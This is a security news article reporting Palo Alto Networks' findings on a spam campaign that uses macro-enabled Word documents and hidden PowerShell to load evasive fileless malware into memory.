Macro-Enabled MS Word Docs and PowerShell Scripts Used in Rash of Undetectable Malware
Malware creators are always on the hunt for new methods to exploit computers and attack them in ways that undermine the abilities to detect and remove such threats. In the latest accomplishments of computer hackers and cybercrooks, the use of macro-enabled MS Word documents and Windows PowerShell is being exploited to deliver fileless malware.
Cybercrooks and malware creators are now paying special attention to the work of their peers and what the cybersecurity community is doing to combat emerging threats. With that information on hand, malware peddlers can leverage the use of macro-enabled MS Word documents and PowerShell to spread malware. The rather new campaign, one that isn't necessarily new, is the first time that we have seen it used in the wild primarily to evade detection.
The security researchers from Palo Alto Networks made the discovery of the campaign and had only detected about 1,500 spam emails using the technique of spreading malware through macro-enabled Word documents and Windows PowerShell files as attachments.
There is a certain ironic case when it comes to macro-enabled Word documents containing malware. If you think back or research much older malware threats and computer viruses, you will stumble upon instances that took place possibly over ten years ago where threats were spread through Word macros. As it turns out, malware creators have not entirely abandoned their old idea and what is was old is now new again only the latest malicious macro-enabled Word docs automatically execute when the document is opened for MS Office installs where Word macros are turned on.
Researchers from Palo Alto Networks are claiming that the new campaign of using infected macro Word files contain the ability to start a hidden instance of Windows PowerShell and download malicious scrips that are later executed by the PowerShell process. PowerShell is known to be a powerful scripting language that had its conception from the release of Windows 7. The scripts used support both 32-bit and 64-bit platforms, thus covering a wide variety of systems. Even still, the sophistication of the scripts leads to verification of the computer not being a virtual machine, running debugging apps, or a specific type of system used in an educational or hospital environment.
The many checks and tests performed by the new wave of macro-enabled Word document malware prove its newfound sophistication in an attempt to not only evades detection and removal but to effectively infect targeted systems only.
Spilling the fine details about the latest macro-enabled Word document malware, Palo Alto Networks has also concluded that the threat gets written directly into a computer's memory without scouring the hard drive. Through the protection of the malware download, the scripts will download instructions from the C&C (Command and Control) servers to determine what family of malware to then download and install.
So far, the campaign using macro-enabled Word documents to spread malware has mostly targeted computers located in the US, Canada, Austria, Germany, France, Poland, and the UK. As the threats make their rounds, we expect the malicious concoction to reach other countries around the world, especially considering the threat's ability to evade detection and cleverly narrow its target outlook.